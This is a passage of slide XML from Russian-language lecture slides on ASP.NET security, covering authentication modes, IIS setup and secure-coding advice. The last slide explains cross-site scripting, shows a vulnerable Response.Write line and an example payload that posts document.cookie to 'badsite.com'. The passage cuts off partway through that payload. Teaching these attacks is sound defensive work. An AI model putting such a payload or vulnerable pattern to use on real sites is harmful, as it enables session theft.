                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Basic authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>: The user name and password are passed as clear text. This is the only form of authentication supported by all browsers as part of the HTML standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Digest authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>: The user name and password are not transmitted. Instead, a cryptographically secure hash with this information is sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Integrated Windows authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>: The user name and password are not transmitted. Instead, the identity of a user already logged into Windows is passed automatically as a token. This is the only form of authentication that takes place transparently (without user intervention).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>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57200" y="274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Windows аутентификация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" smtClean="0"/>
              <a:t>Причины использования Windows Authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Меньший объем программирования.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно использовать существующие учетные записи пользователей (user logins).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Используется единая модель аутентификации для различных приложений.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Позволяет использовать impersonation и Windows security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Причины не использовать</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Пользователями могут быть пользователи Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>На компьютерах пользователей должна работать ОС Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Нельзя вмешаться или настроить процесс аутентификации.</a:t>
            </a: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57200" y="274638"/>
            <a:ext cx="1954213" cy="3298825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146435" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="16032" t="10634" r="21941" b="4582"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2566988" y="101600"/>
            <a:ext cx="6577012" cy="6742113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Реализация Windows Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Для использования Windows аутентификации в ASP.NET приложении и доступа к user identity в ASP.NET необходимо выполнить три шага для IIS 5 или IIS 6.0 или два шага для IIS 7.0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Выбрать Windows authentication в IIS Manager.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Задать в web.config файле ASP.NET использование информации аутентификации IIS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Запретить анонимный доступ к web страницам, подпапкам или всему </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>приложению.</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777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Советы по безопасному кодированию</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1268413"/>
            <a:ext cx="8362950" cy="5184775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>При создании </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложения необходимо использовать следующие советы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не доверять введенным пользователями данным</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>. Всегда выполнять строгую проверку правильности данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не использовать конкатенацию строк для создания </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>операторов.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> Всегда использовать параметризированные запросы (хранимые процедуры), чтобы в ваше приложения не внедрялся </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>код.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не выводите данные введенные пользователем напрямую в ваши </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>страницы без их проверки (валидации) и кодирования (encoding)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>. Пользователь может ввести фрагменты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>кода (например, скрипт), который приведет к уязвимости скриптов при связи между сайтами (cross-site scripting vulnerabilities). Поэтому всегда используйте метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>HttpUtility.HtmlEncode()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> для удаления специальных символов, таких как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>прежде чем выводить их на страницы или используйте ЭУ, которые выполняют такое кодирование автоматически.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не храните критически важные для бизнеса данные или данные, которые влияют на принятие решений внутренними бизнес правилами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>приложения в скрытых полях </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>страницы.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> Скрытые поля могут быть легко изменены, простым просмотром исходного кода </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>страницы, ее изменения и сохранения в файле. Затем злоумышленник может просто передать локально сохраненную, измененную </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>страницу на сервер. Имеются </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>plug-ins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>браузера,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>которые позволяют сделать это очень просто.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="18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ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не храните критически важные для бизнеса данные или данные, которые влияют на принятие решений внутренними бизнес правилами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>приложения в данных view state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: View state это просто другое скрытое поле страницы и оно может легко декодироваться и просматриваться. Если свойству страницы EnableViewStateMAC задано значение true, то view state будет подписываться с помощью кода аутентификации сообщений, который  создается на основе machine key заданного в файле machine.config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>сервера. Рекомендуется задавать EnableViewStateMAC=true, каждый раз, когда вы включаете данные в view state, которые не могут быть изменены пользователями просматривающими вашу web страницу. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Используйте SSL при использовании базовой аутентификации или аутентификации с помощью ASP.NET форм.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Защищайте ваши куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: при использовании аутентификации с помощью форм всегда защищайте ваши куки, которые указывают на аутентификацию пользователя и устанавливайте timeouts как можно короче и настолько длинным, насколько это необходимо.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Используйте SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: в общем случае, если web приложение обрабатывает важные данные, то обезопасьте весь web сайт с помощью использования SSL. Не забудьте защитить даже папки с картинками (image directories) или папки с другими файлами не обрабатываемыми приложением напрямую через SSL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="16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922337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Рекомендации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Никогда не храните важные для бизнеса данные во view state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: View state это просто скрытое поле на странице и оно может легко раскодироваться и просматриваться. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Используйте установку EnableViewStateMAC = true для страницы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>, в этом случае view state будет шифроваться с помощью message authentication code, который создается на основе machine key из файла machine.config на web server. Рекомендуется использовать установку EnableViewStateMAC=true, если во view state включаются данные, которые не должны меняться пользователем, который просматривает страницу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Используйте интерфейс SSL (Secure Sockets Layer) при использовании Базовой аутентификации или ASP.NET аутентификации на основе форм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Защищайте свои cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: Всегда защищайте куки, используемые для аутентификации, при использовании аутентификации на основе форм, и устанавливайте timeouts настолько короткими, насколько это возможно или настолько длинными, насколько это необходимо.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>Используйте SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: Обычно, если web приложение работает с важными данными, то обезопасьте весь website с помощью SSL. Не забудьте защитить даже директории с изображениями и другими файлами, которые не обрабатываются приложением напрямую через SSL.</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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Межсайтовый скриптинга (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8507413" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Межсайтовый скриптинг (XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>) – это уязвимость серверного кода, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте не проверяется на наличие запретных символов, таких, как: &lt;,&gt;,’,” и многих других.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Response.Write(Request.QueryString(“name”));</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Например:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;a href=http://www.contoso.com/req.asp?name=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;FORM action=http://www.badsite.com/data.asp method=post id=”badForm”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;input name=”cookie” type=”hidden”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;/FORM&gt; &lt;SRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>badForm.cookie.value=document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
